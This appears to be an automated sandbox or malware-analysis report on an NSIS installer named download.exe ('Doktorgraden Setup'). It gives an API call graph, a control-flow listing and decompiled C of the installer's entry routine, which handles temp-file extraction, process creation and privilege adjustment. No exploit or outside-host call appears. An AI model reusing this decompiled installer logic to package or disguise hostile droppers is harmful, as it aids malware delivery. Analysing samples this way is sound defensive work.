4020f6 12974->12975 12976 402acb 17 API calls 12975->12976 12978 402100 12976->12978 12977 402142 CoCreateInstance 12982 402161 12977->12982 12984 40220c 12977->12984 12978->12977 12979 402acb 17 API calls 12978->12979 12979->12977 12980 401423 24 API calls 12981 402242 12980->12981 12983 4021ec MultiByteToWideChar 12982->12983 12982->12984 12983->12984 12984->12980 12984->12981 12985 4023d6 12986 402acb 17 API calls 12985->12986 12987 4023e8 12986->12987 12988 402acb 17 API calls 12987->12988 12989 4023f2 12988->12989 13002 402b5b 12989->13002 12992 402957 12993 402427 12995 402433 12993->12995 12997 402aa9 17 API calls 12993->12997 12994 402acb 17 API calls 12996 402420 lstrlenA 12994->12996 12998 402452 RegSetValueExA 12995->12998 13006 402f9c 12995->13006 12996->12993 12997->12995 13000 402468 RegCloseKey 12998->13000 13000->12992 13003 402b76 13002->13003 13026 405e31 13003->13026 13008 402fb2 13006->13008 13007 402fe0 13030 40318b 13007->13030 13008->13007 13035 4031a1 SetFilePointer 13008->13035 13012 403124 13014 403166 13012->13014 13019 403128 13012->13019 13013 402ffd GetTickCount 13015 40310e 13013->13015 13022 403029 13013->13022 13016 40318b ReadFile 13014->13016 13015->12998 13016->13015 13017 40318b ReadFile 13017->13022 13018 40318b ReadFile 13018->13019 13019->13015 13019->13018 13020 405bbd WriteFile 13019->13020 13020->13019 13021 40307f GetTickCount 13021->13022 13022->13015 13022->13017 13022->13021 13023 4030a4 MulDiv wsprintfA 13022->13023 13033 405bbd WriteFile 13022->13033 13024 4050a4 24 API calls 13023->13024 13024->13022 13027 405e40 13026->13027 13028 402402 13027->13028 13029 405e4b RegCreateKeyExA 13027->13029 13028->12992 13028->12993 13028->12994 13029->13028 13031 405b8e ReadFile 13030->13031 13032 402feb 13031->13032 13032->13012 13032->13013 13032->13015 13034 405bdb 13033->13034 13034->13022 13035->13007 13036 4014d6 13037 402aa9 17 API calls 13036->13037 13038 4014dc Sleep 13037->13038 13040 402957 13038->13040 13041 401759 13042 402acb 17 API calls 13041->13042 13043 401760 13042->13043 13044 401786 13043->13044 13045 40177e 13043->13045 13084 405f7d lstrcpynA 13044->13084 13083 405f7d lstrcpynA 13045->13083 13048 401784 13052 4061e7 5 API calls 13048->13052 13049 401791 13085 405915 lstrlenA CharPrevA 13049->13085 13062 4017a3 13052->13062 13056 4017ba CompareFileTime 13056->13062 13057 40187e 13058 4050a4 24 API calls 13057->13058 13061 401888 13058->13061 13059 4050a4 24 API calls 13067 40186a 13059->13067 13060 405f7d lstrcpynA 13060->13062 13063 402f9c 31 API calls 13061->13063 13062->13056 13062->13057 13062->13060 13068 405f9f 17 API calls 13062->13068 13077 401855 13062->13077 13079 405af1 GetFileAttributesA 13062->13079 13082 405b16 GetFileAttributesA CreateFileA 13062->13082 13088 406280 FindFirstFileA 13062->13088 13091 405699 13062->13091 13064 40189b 13063->13064 13065 4018af SetFileTime 13064->13065 13066 4018c1 CloseHandle 13064->13066 13065->13066 13066->13067 13069 4018d2 13066->13069 13068->13062 13070 4018d7 13069->13070 13071 4018ea 13069->13071 13072 405f9f 17 API calls 13070->13072 13073 405f9f 17 API calls 13071->13073 13075 4018df lstrcatA 13072->13075 13076 4018f2 13073->13076 13075->13076 13076->13067 13078 405699 MessageBoxIndirectA 13076->13078 13077->13059 13077->13067 13078->13067 13080 405b10 13079->13080 13081 405b03 SetFileAttributesA 13079->13081 13080->13062 13081->13080 13082->13062 13083->13048 13084->13049 13086 401797 lstrcatA 13085->13086 13087 40592f lstrcatA 13085->13087 13086->13048 13087->13086 13089 4062a1 13088->13089 13090 406296 FindClose 13088->13090 13089->13062 13090->13089 13092 4056ae 13091->13092 13093 4056c2 MessageBoxIndirectA 13092->13093 13094 4056fa 13092->13094 13093->13094 13094->13062 13095 401d9b GetDC 13096 402aa9 17 API calls 13095->13096 13097 401dad GetDeviceCaps MulDiv ReleaseDC 13096->13097 13098 402aa9 17 API calls 13097->13098 13099 401dde 13098->13099 13100 405f9f 17 API calls 13099->13100 13101 401e1b CreateFontIndirectA 13100->13101 13102 40257d 13101->13102 13103 40159d 13104 402acb 17 API calls 13103->13104 13105 4015a4 SetFileAttributesA 13104->13105 13106 4015b6 13105->13106 13107 40171f 13108 402acb 17 API calls 13107->13108 13109 401726 SearchPathA 13108->13109 13110 401741 13109->13110 13111 4051e2 13112 405204 GetDlgItem GetDlgItem GetDlgItem 13111->13112 13113 40538d 13111->13113 13157 404051 SendMessageA 13112->13157 13115 405395 GetDlgItem CreateThread CloseHandle 13113->13115 13116 4053bd 13113->13116 13115->13116 13160 405176 OleInitialize 13115->13160 13117 4053eb 13116->13117 13119 4053d3 ShowWindow ShowWindow 13116->13119 13120 40540c 13116->13120 13121 4053f3 13117->13121 13122 405446 13117->13122 13118 405274 13127 40527b GetClientRect GetSystemMetrics SendMessageA SendMessageA 13118->13127 13159 404051 SendMessageA 13119->13159 13126 404083 8 API calls 13120->13126 13124 4053fb 13121->13124 13125 40541f ShowWindow 13121->13125 13122->13120 13130 405453 SendMessageA 13122->13130 13131 403ff5 SendMessageA 13124->13131 13133 405431 13125->13133 13134 40543f 13125->13134 13132 405418 13126->13132 13128 4052e9 13127->13128 13129 4052cd SendMessageA SendMessageA 13127->13129 13135 4052fc 13128->13135 13136 4052ee SendMessageA 13128->13136 13129->13128 13130->13132 13137 40546c CreatePopupMenu 13130->13137 13131->13120 13138 4050a4 24 API calls 13133->13138 13139 403ff5 SendMessageA 13134->13139 13141 40401c 18 API calls 13135->13141 13136->13135 13140 405f9f 17 API calls 13137->13140 13138->13134 13139->13122 13142 40547c AppendMenuA 13140->13142 13143 40530c 13141->13143 13144 40549a GetWindowRect 13142->13144 13145 4054ad TrackPopupMenu 13142->13145 13146 405315 ShowWindow 13143->13146 13147 405349 GetDlgItem SendMessageA 13143->13147 13144->13145 13145->13132 13148 4054c9 13145->13148 13149 405338 13146->13149 13150 40532b ShowWindow 13146->13150 13147->13132 13151 405370 SendMessageA SendMessageA 13147->13151 13152 4054e8 SendMessageA 13148->13152 13158 404051 SendMessageA 13149->13158 13150->13149 13151->13132 13152->13152 13153 405505 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 13152->13153 13155 405527 SendMessageA 13153->13155 13155->13155 13156 405549 GlobalUnlock SetClipboardData CloseClipboard 13155->13156 13156->13132 13157->13118 13158->13147 13159->13117 13161 404068 SendMessageA 13160->13161 13165 405199 13161->13165 13162 4051c0 13163 404068 SendMessageA 13162->13163 13164 4051d2 OleUninitialize 13163->13164 13165->13162 13166 401389 2 API calls 13165->13166 13166->13165 13167 4024e5 13168 402b0b 17 API calls 13167->13168 13169 4024ef 13168->13169 13170 402aa9 17 API calls 13169->13170 13171 4024f8 13170->13171 13172 402513 RegEnumKeyA 13171->13172 13173 40251f RegEnumValueA 13171->13173 13175 40271c 13171->13175 13174 402534 RegCloseKey 13172->13174 13173->13174 13174->13175 13177 4031e9 SetErrorMode GetVersion 13178 40322a 13177->13178 13179 403230 13177->13179 13180 406315 5 API calls 13178->13180 13181 4062a7 3 API calls 13179->13181 13180->13179 13182 403246 lstrlenA 13181->13182 13182->13179 13183 403255 13182->13183 13184 406315 5 API calls 13183->13184 13185 40325c 13184->13185 13186 406315 5 API calls 13185->13186 13187 403263 13186->13187 13188 406315 5 API calls 13187->13188 13189 40326f #17 OleInitialize SHGetFileInfoA 13188->13189 13267 405f7d lstrcpynA 13189->13267 13192 4032bb GetCommandLineA 13268 405f7d lstrcpynA 13192->13268 13194 4032cd 13195 405940 CharNextA 13194->13195 13196 4032f6 CharNextA 13195->13196 13204 403306 13196->13204 13197 4033d0 13198 4033e3 GetTempPathA 13197->13198 13269 4031b8 13198->13269 13200 4033fb 13201 403455 DeleteFileA 13200->13201 13202 4033ff GetWindowsDirectoryA lstrcatA 13200->13202 13279 402d63 GetTickCount GetModuleFileNameA 13201->13279 13205 4031b8 12 API calls 13202->13205 13203 405940 CharNextA 13203->13204 13204->13197 13204->13203 13208 4033d2 13204->13208 13207 40341b 13205->13207 13207->13201 13210 40341f GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 13207->13210 13374 405f7d lstrcpynA 13208->13374 13209 403469 13214 4034ef 13209->13214 13218 405940 CharNextA 13209->13218 13262 4034ff 13209->13262 13213 4031b8 12 API calls 13210->13213 13216 40344d 13213->13216 13307 4037ab 13214->13307 13216->13201 13216->13262 13221 403484 13218->13221 13219 403637 13223 4036b9 ExitProcess 13219->13223 13224 40363f GetCurrentProcess OpenProcessToken 13219->13224 13220 403519 13222 405699 MessageBoxIndirectA 13220->13222 13226 4034ca 13221->13226 13227 40352f 13221->13227 13228 403527 ExitProcess 13222->13228 13229 40368a 13224->13229 13230 40365a LookupPrivilegeValueA AdjustTokenPrivileges 13224->13230 13375 405a03 13226->13375 13363 405604 13227->13363 13233 406315 5 API calls 13229->13233 13230->13229 13236 403691 13233->13236 13239 4036a6 ExitWindowsEx 13236->13239 13240 4036b2 13236->13240 13237 403550 lstrcatA lstrcmpiA 13242 40356c 13237->13242 13237->13262 13238 403545 lstrcatA 13238->13237 13239->13223 13239->13240 13243 40140b 2 API calls 13240->13243 13245 403571 13242->13245 13246 403578 13242->13246 13243->13223 13244 4034e4 13390 405f7d lstrcpynA 13244->13390 13398 40556a CreateDirectoryA 13245->13398 13403 4055e7 CreateDirectoryA 13246->13403 13250 40357d SetCurrentDirectoryA 13252 403597 13250->13252 13253 40358c 13250->13253 13366 405f7d lstrcpynA 13252->13366 13406 405f7d lstrcpynA 13253->13406 13256 405f9f 17 API calls 13257 4035d6 DeleteFileA 13256->13257 13258 4035e3 CopyFileA 13257->13258 13264 4035a5 13257->13264 13258->13264 13259 40362b 13260 405d5c 36 API calls 13259->13260 13260->13262 13391 4036d1 13262->13391 13263 405f9f 17 API calls 13263->13264 13264->13256 13264->13259 13264->13263 13266 403617 CloseHandle 13264->13266 13367 405d5c MoveFileExA 13264->13367 13371 40561c CreateProcessA 13264->13371 13266->13264 13267->13192 13268->13194 13270 4061e7 5 API calls 13269->13270 13271 4031c4 13270->13271 13272 4031ce 13271->13272 13273 405915 3 API calls 13271->13273 13272->13200 13274 4031d6 13273->13274 13275 4055e7 2 API calls 13274->13275 13276 4031dc 13275->13276 13277 405b45 2 API calls 13276->13277 13278 4031e7 13277->13278 13278->13200 13407 405b16 GetFileAttributesA CreateFileA 13279->13407 13281 402da3 13306 402db3 13281->13306 13408 405f7d lstrcpynA 13281->13408 13283 402dc9 13409 40595c lstrlenA 13283->13409 13287 402dda GetFileSize 13302 402ed6 13287->13302 13305 402df1 13287->13305 13289 402edf 13291 402f0f GlobalAlloc 13289->13291 13289->13306 13426 4031a1 SetFilePointer 13289->13426 13290 40318b ReadFile 13290->13305 13425 4031a1 SetFilePointer 13291->13425 13293 402f42 13295 402cff 6 API calls 13293->13295 13295->13306 13296 402ef8 13298 40318b ReadFile 13296->13298 13297 402f2a 13299 402f9c 31 API calls 13297->13299 13300 402f03 13298->13300 13303 402f36 13299->13303 13300->13291 13300->13306 13301 402cff 6 API calls 13301->13305 13414 402cff 13302->13414 13303->13303 13304 402f73 SetFilePointer 13303->13304 13303->13306 13304->13306 13305->13290 13305->13293 13305->13301 13305->13302 13305->13306 13306->13209 13308 406315 5 API calls 13307->13308 13309 4037bf 13308->13309 13310 4037c5 GetUserDefaultUILanguage 13309->13310 13311 4037d7 13309->13311 13431 405edb wsprintfA 13310->13431 13313 405e64 3 API calls 13311->13313 13315 403802 13313->13315 13314 4037d5 13432 403a70 13314->13432 13316 403820 lstrcatA 13315->13316 13317 405e64 3 API calls 13315->13317 13316->13314 13317->13316 13320 405a03 18 API calls 13321 403852 13320->13321 13322 4038db 13321->13322 13324 405e64 3 API calls 13321->13324 13323 405a03 18 API calls 13322->13323 13325 4038e1 13323->13325 13327 40387e 13324->13327 13326 4038f1 LoadImageA 13325->13326 13328 405f9f 17 API calls 13325->13328 13329 403997 13326->13329 13330 403918 RegisterClassA 13326->13330 13327->13322 13331 40389a lstrlenA 13327->13331 13334 405940 CharNextA 13327->13334 13328->13326 13333 40140b 2 API calls 13329->13333 13332 40394e SystemParametersInfoA CreateWindowExA 13330->13332 13362 4039a1 13330->13362 13335 4038a8 lstrcmpiA 13331->13335 13336 4038ce 13331->13336 13332->13329 13337 40399d 13333->13337 13339 403898 13334->13339 13335->13336 13340 4038b8 GetFileAttributesA 13335->13340 13338 405915 3 API calls 13336->13338 13341 403a70 18 API calls 13337->13341 13337->13362 13342 4038d4 13338->13342 13339->13331 13343 4038c4 13340->13343 13344 4039ae 13341->13344 13440 405f7d lstrcpynA 13342->13440 13343->13336 13346 40595c 2 API calls 13343->13346 13347 4039ba ShowWindow 13344->13347 13348 403a3d 13344->13348 13346->13336 13350 4062a7 3 API calls 13347->13350 13349 405176 5 API calls 13348->13349 13351 403a43 13349->13351 13352 4039d2 13350->13352 13353 403a47 13351->13353 13354 403a5f 13351->13354 13355 4039e0 GetClassInfoA 13352->13355 13357 4062a7 3 API calls 13352->13357 13360 40140b 2 API calls 13353->13360 13353->13362 13356 40140b 2 API calls 13354->13356 13358 4039f4 GetClassInfoA RegisterClassA 13355->13358 13359 403a0a DialogBoxParamA 13355->13359 13356->13362 13357->13355 13358->13359 13361 40140b 2 API calls 13359->13361 13360->13362 13361->13362 13362->13262 13364 406315 5 API calls 13363->13364 13365 403534 lstrcatA 13364->13365 13365->13237 13365->13238 13366->13264 13368 405d70 13367->13368 13369 405d7d 13367->13369 13442 405bec 13368->13442 13369->13264 13372 40565b 13371->13372 13373 40564f CloseHandle 13371->13373 13372->13264 13373->13372 13374->13198 13476 405f7d lstrcpynA 13375->13476 13377 405a14 13477 4059ae CharNextA CharNextA 13377->13477 13380 4034d5 13380->13262 13389 405f7d lstrcpynA 13380->13389 13381 4061e7 5 API calls 13387 405a2a 13381->13387 13382 405a55 lstrlenA 13383 405a60 13382->13383 13382->13387 13385 405915 3 API calls 13383->13385 13384 406280 2 API calls 13384->13387 13386 405a65 GetFileAttributesA 13385->13386 13386->13380 13387->13380 13387->13382 13387->13384 13388 40595c 2 API calls 13387->13388 13388->13382 13389->13244 13390->13214 13392 4036e9 13391->13392 13393 4036db CloseHandle 13391->13393 13483 403716 13392->13483 13393->13392 13399 403576 13398->13399 13400 4055bb GetLastError 13398->13400 13399->13250 13400->13399 13401 4055ca SetFileSecurityA 13400->13401 13401->13399 13402 4055e0 GetLastError 13401->13402 13402->13399 13404 4055f7 13403->13404 13405 4055fb GetLastError 13403->13405 13404->13250 13405->13404 13406->13252 13407->13281 13408->13283 13410 405969 13409->13410 13411 402dcf 13410->13411 13412 40596e CharPrevA 13410->13412 13413 405f7d lstrcpynA 13411->13413 13412->13410 13412->13411 13413->13287 13415 402d20 13414->13415 13416 402d08 13414->13416 13419 402d30 GetTickCount 13415->13419 13420 402d28 13415->13420 13417 402d11 DestroyWindow 13416->13417 13418 402d18 13416->13418 13417->13418 13418->13289 13422 402d61 13419->13422 13423 402d3e CreateDialogParamA ShowWindow 13419->13423 13427 406351 13420->13427 13422->13289 13423->13422 13425->13297 13426->13296 13428 40636e PeekMessageA 13427->13428 13429 406364 DispatchMessageA 13428->13429 13430 402d2e 13428->13430 13429->13428 13430->13289 13431->13314 13433 403a84 13432->13433 13441 405edb wsprintfA 13433->13441 13435 403af5 13436 403b29 18 API calls 13435->13436 13438 403afa 13436->13438 13437 403830 13437->13320 13438->13437 13439 405f9f 17 API calls 13438->13439 13439->13438 13440->13322 13441->13435 13443 405c12 13442->13443 13444 405c38 GetShortPathNameA 13442->13444 13469 405b16 GetFileAttributesA CreateFileA 13443->13469 13446 405d57 13444->13446 13447 405c4d 13444->13447 13446->13369 13447->13446 13449 405c55 wsprintfA 13447->13449 13448 405c1c CloseHandle GetShortPathNameA 13448->13446 13450 405c30 13448->13450 13451 405f9f 17 API calls 13449->13451 13450->13444 13450->13446 13452 405c7d 13451->13452 13470 405b16 GetFileAttributesA CreateFileA 13452->13470 13454 405c8a 13454->13446 13455 405c99 GetFileSize GlobalAlloc 13454->13455 13456 405d50 CloseHandle 13455->13456 13457 405cbb 13455->13457 13456->13446 13458 405b8e ReadFile 13457->13458 13459 405cc3 13458->13459 13459->13456 13471 405a7b lstrlenA 13459->13471 13462 405cda lstrcpyA 13465 405cfc 13462->13465 13463 405cee 13464 405a7b 4 API calls 13463->13464 13464->13465 13466 405d33 SetFilePointer 13465->13466 13467 405bbd WriteFile 13466->13467 13468 405d49 GlobalFree 13467->13468 13468->13456 13469->13448 13470->13454 13472 405abc lstrlenA 13471->13472 13473 405ac4 13472->13473 13474 405a95 lstrcmpiA 13472->13474 13473->13462 13473->13463 13474->13473 13475 405ab3 CharNextA 13474->13475 13475->13472 13476->13377 13478 4059d9 13477->13478 13479 4059c9 13477->13479 13481 405940 CharNextA 13478->13481 13482 4059f9 13478->13482 13479->13478 13480 4059d4 CharNextA 13479->13480 13480->13482 13481->13478 13482->13380 13482->13381 13484 403724 13483->13484 13485 4036ee 13484->13485 13486 403729 FreeLibrary GlobalFree 13484->13486 13487 405745 13485->13487 13486->13485 13486->13486 13488 405a03 18 API calls 13487->13488 13489 405765 13488->13489 13490 405784 13489->13490 13491 40576d DeleteFileA 13489->13491 13497 4058b2 13490->13497 13527 405f7d lstrcpynA 13490->13527 13492 403508 OleUninitialize 13491->13492 13492->13219 13492->13220 13494 4057aa 13495 4057b0 lstrcatA 13494->13495 13496 4057bd 13494->13496 13498 4057c3 13495->13498 13499 40595c 2 API calls 13496->13499 13497->13492 13500 406280 2 API calls 13497->13500 13502 4057d1 lstrcatA 13498->13502 13504 4057dc lstrlenA FindFirstFileA 13498->13504 13499->13498 13501 4058d6 13500->13501 13501->13492 13503 4058da 13501->13503 13502->13504 13505 405915 3 API calls 13503->13505 13504->13497 13515 405800 13504->13515 13506 4058e0 13505->13506 13508 4056fd 5 API calls 13506->13508 13507 405940 CharNextA 13507->13515 13509 4058ec 13508->13509 13510 4058f0 13509->13510 13511 405906 13509->13511 13510->13492 13517 4050a4 24 API calls 13510->13517 13514 4050a4 24 API calls 13511->13514 13512 405891 FindNextFileA 13512->13515 13516 4058a9 FindClose 13512->13516 13514->13492 13515->13507 13515->13512 13524 405852 13515->13524 13528 405f7d lstrcpynA 13515->13528 13516->13497 13518 4058fd 13517->13518 13519 405d5c 36 API calls 13518->13519 13522 405904 13519->13522 13521 405745 60 API calls 13521->13524 13522->13492 13523 4050a4 24 API calls 13523->13512 13524->13512 13524->13521 13524->13523 13525 4050a4 24 API calls 13524->13525 13526 405d5c 36 API calls 13524->13526 13529 4056fd 13524->13529 13525->13524 13526->13524 13527->13494 13528->13515 13530 405af1 2 API calls 13529->13530 13531 405709 13530->13531 13532 40572a 13531->13532 13533 405720 DeleteFileA 13531->13533 13534 405718 RemoveDirectoryA 13531->13534 13532->13524 13535 405726 13533->13535 13534->13535 13535->13532 13536 405736 SetFileAttributesA 13535->13536 13536->13532 13537 40166a 13538 402acb 17 API calls 13537->13538 13539 401671 13538->13539 13540 402acb 17 API calls 13539->13540 13541 40167a 13540->13541 13542 402acb 17 API calls 13541->13542 13543 401683 MoveFileA 13542->13543 13544 401696 13543->13544 13545 40168f 13543->13545 13547 406280 2 API calls 13544->13547 13549 402242 13544->13549 13546 401423 24 API calls 13545->13546 13546->13549 13548 4016a5 13547->13548 13548->13549 13550 405d5c 36 API calls 13548->13550 13550->13545 13551 401e2b 13552 402aa9 17 API calls 13551->13552 13553 401e31 13552->13553 13554 402aa9 17 API calls 13553->13554 13555 401e3d 13554->13555 13556 401e54 EnableWindow 13555->13556 13557 401e49 ShowWindow 13555->13557 13558 402957 13556->13558 13557->13558 13559 40156f 13560 401586 13559->13560 13561 40157f ShowWindow 13559->13561 13562 402904 13560->13562 13563 401596 ShowWindow 13560->13563 13561->13560 13563->13562 13564 4028ff 13563->13564 13566 405edb wsprintfA 13564->13566 13566->13562 13567 401932 13568 401934 13567->13568 13569 402acb 17 API calls 13568->13569 13570 401939 13569->13570 13571 405745 67 API calls 13570->13571 13572 401942 13571->13572 13573 402473 13574 402b0b 17 API calls 13573->13574 13575 40247d 13574->13575 13576 402acb 17 API calls 13575->13576 13577 402486 13576->13577 13578 402490 RegQueryValueExA 13577->13578 13583 40271c 13577->13583 13579 4024b0 13578->13579 13580 4024b6 RegCloseKey 13578->13580 13579->13580 13584 405edb wsprintfA 13579->13584 13580->13583 13584->13580 13585 4015bb 13586 402acb 17 API calls 13585->13586 13587 4015c2 13586->13587 13588 4059ae 4 API calls 13587->13588 13600 4015ca 13588->13600 13589 401624 13591 401652 13589->13591 13592 401629 13589->13592 13590 405940 CharNextA 13590->13600 13594 401423 24 API calls 13591->13594 13593 401423 24 API calls 13592->13593 13595 401630 13593->13595 13602 40164a 13594->13602 13604 405f7d lstrcpynA 13595->13604 13597 4055e7 2 API calls 13597->13600 13598 405604 5 API calls 13598->13600 13599 40163b SetCurrentDirectoryA 13599->13602 13600->13589 13600->13590 13600->13597 13600->13598 13601 40160c GetFileAttributesA 13600->13601 13603 40556a 4 API calls 13600->13603 13601->13600 13603->13600 13604->13599 13605 4022fc 13606 402304 13605->13606 13607 40230a 13605->13607 13608 402acb 17 API calls 13606->13608 13609 402acb 17 API calls 13607->13609 13612 40231a 13607->13612 13608->13607 13609->13612 13610 402acb 17 API calls 13613 402328 13610->13613 13611 402acb 17 API calls 13614 402331 WritePrivateProfileStringA 13611->13614 13612->13610 13612->13613 13613->13611 13615 4026fe 13616 402acb 17 API calls 13615->13616 13617 402705 FindFirstFileA 13616->13617 13618 402728 13617->13618 13622 402718 13617->13622 13619 40272f 13618->13619 13623 405edb wsprintfA 13618->13623 13624 405f7d lstrcpynA 13619->13624 13623->13619 13624->13622

                                                      Executed Functions

                                                      Function 004031E9 Relevance: 93.1, APIs: 32, Strings: 21, Instructions: 366stringcomfileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 4031e9-403228 SetErrorMode GetVersion 1 40322a-403232 call 406315 0->1 2 40323b 0->2 1->2 7 403234 1->7 3 403240-403253 call 4062a7 lstrlenA 2->3 9 403255-403271 call 406315 * 3 3->9 7->2 16 403282-4032e0 #17 OleInitialize SHGetFileInfoA call 405f7d GetCommandLineA call 405f7d 9->16 17 403273-403279 9->17 24 4032e2-4032e7 16->24 25 4032ec-403301 call 405940 CharNextA 16->25 17->16 21 40327b 17->21 21->16 24->25 28 4033c6-4033ca 25->28 29 4033d0 28->29 30 403306-403309 28->30 33 4033e3-4033fd GetTempPathA call 4031b8 29->33 31 403311-403319 30->31 32 40330b-40330f 30->32 35 403321-403324 31->35 36 40331b-40331c 31->36 32->31 32->32 42 403455-40346f DeleteFileA call 402d63 33->42 43 4033ff-40341d GetWindowsDirectoryA lstrcatA call 4031b8 33->43 38 4033b6-4033c3 call 405940 35->38 39 40332a-40332e 35->39 36->35 38->28 57 4033c5 38->57 40 403330-403336 39->40 41 403346-403373 39->41 45 403338-40333a 40->45 46 40333c 40->46 47 403375-40337b 41->47 48 403386-4033b4 41->48 59 403503-403513 call 4036d1 OleUninitialize 42->59 60 403475-40347b 42->60 43->42 58 40341f-40344f GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4031b8 43->58 45->41 45->46 46->41 52 403381 47->52 53 40337d-40337f 47->53 48->38 55 4033d2-4033de call 405f7d 48->55 52->48 53->48 53->52 55->33 57->28 58->42 58->59 70 403637-40363d 59->70 71 403519-403529 call 405699 ExitProcess 59->71 64 4034f3-4034fa call 4037ab 60->64 65 40347d-403488 call 405940 60->65 72 4034ff 64->72 74 40348a-4034b3 65->74 75 4034be-4034c8 65->75 77 4036b9-4036c1 70->77 78 40363f-403658 GetCurrentProcess OpenProcessToken 70->78 72->59 79 4034b5-4034b7 74->79 82 4034ca-4034d7 call 405a03 75->82 83 40352f-403543 call 405604 lstrcatA 75->83 80 4036c3 77->80 81 4036c7-4036cb ExitProcess 77->81 85 40368a-403698 call 406315 78->85 86 40365a-403684 LookupPrivilegeValueA AdjustTokenPrivileges 78->86 79->75 87 4034b9-4034bc 79->87 80->81 82->59 94 4034d9-4034ef call 405f7d * 2 82->94 95 403550-40356a lstrcatA lstrcmpiA 83->95 96 403545-40354b lstrcatA 83->96 97 4036a6-4036b0 ExitWindowsEx 85->97 98 40369a-4036a4 85->98 86->85 87->75 87->79 94->64 95->59 101 40356c-40356f 95->101 96->95 97->77 99 4036b2-4036b4 call 40140b 97->99 98->97 98->99 99->77 104 403571-403576 call 40556a 101->104 105 403578 call 4055e7 101->105 110 40357d-40358a SetCurrentDirectoryA 104->110 105->110 113 403597-4035bf call 405f7d 110->113 114 40358c-403592 call 405f7d 110->114 118 4035c5-4035e1 call 405f9f DeleteFileA 113->118 114->113 121 403622-403629 118->121 122 4035e3-4035f3 CopyFileA 118->122 121->118 123 40362b-403632 call 405d5c 121->123 122->121 124 4035f5-40360e call 405d5c call 405f9f call 40561c 122->124 123->59 132 403613-403615 124->132 132->121 133 403617-40361e CloseHandle 132->133 133->121
                                                      C-Code - Quality: 86%
                                                      			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t63;
				int _t66;
				signed int _t67;
				int _t68;
				signed int _t70;
				intOrPtr _t86;
				intOrPtr _t92;
				void* _t94;
				signed int _t110;
				void* _t113;
				void* _t118;
				intOrPtr* _t119;
				char _t122;
				signed int _t141;
				signed int _t142;
				int _t150;
				void* _t151;
				intOrPtr* _t153;
				CHAR* _t156;
				CHAR* _t157;
				void* _t159;
				char* _t160;
				void* _t163;
				void* _t164;
				intOrPtr _t177;
				char _t189;

				 *(_t164 + 0x18) = 0;
				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t164 + 0x20) = 0;
				 *(_t164 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x7a2f4c = _t42;
				if(_t42 != 6) {
					_t119 = E00406315(0);
					if(_t119 != 0) {
						 *_t119(0xc00);
					}
				}
				_t156 = "UXTHEME";
				do {
					E004062A7(_t156); // executed
					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
				} while ( *_t156 != 0);
				E00406315(0xa);
				 *0x7a2f44 = E00406315(8);
				_t47 = E00406315(6);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x7a2f4f =  *0x7a2f4f | 0x00000040;
					}
				}
				__imp__#17(_t159);
				__imp__OleInitialize(0); // executed
				 *0x7a3018 = _t47;
				SHGetFileInfoA(0x79e500, 0, _t164 + 0x38, 0x160, 0); // executed
				E00405F7D("Doktorgraden Setup", "NSIS Error");
				_t51 = GetCommandLineA();
				_t160 = "\"C:\\Users\\Arthur\\Desktop\\download.exe\"";
				E00405F7D(_t160, _t51);
				 *0x7a2f40 = 0x400000;
				_t53 = _t160;
				if("\"C:\\Users\\Arthur\\Desktop\\download.exe\"" == 0x22) {
					 *(_t164 + 0x14) = 0x22;
					_t53 =  &M007A9001;
				}
				_t55 = CharNextA(E00405940(_t53,  *(_t164 + 0x14)));
				 *(_t164 + 0x1c) = _t55;
				while(1) {
					_t122 =  *_t55;
					_t172 = _t122;
					if(_t122 == 0) {
						break;
					}
					__eflags = _t122 - 0x20;
					if(_t122 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t164 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t164 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405940(_t55,  *(_t164 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E00405F7D("C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Heize",  &(_t55[2]));
										L30:
										_t157 = "C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t157);
										_t59 = E004031B8(_t172);
										_t173 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402D63(_t175,  *(_t164 + 0x20)); // executed
											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												E004036D1();
												__imp__OleUninitialize();
												_t185 =  *((intOrPtr*)(_t164 + 0x10));
												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
													__eflags =  *0x7a2ff4; // 0x0
													if(__eflags == 0) {
														L67:
														_t63 =  *0x7a300c;
														__eflags = _t63 - 0xffffffff;
														if(_t63 != 0xffffffff) {
															 *(_t164 + 0x14) = _t63;
														}
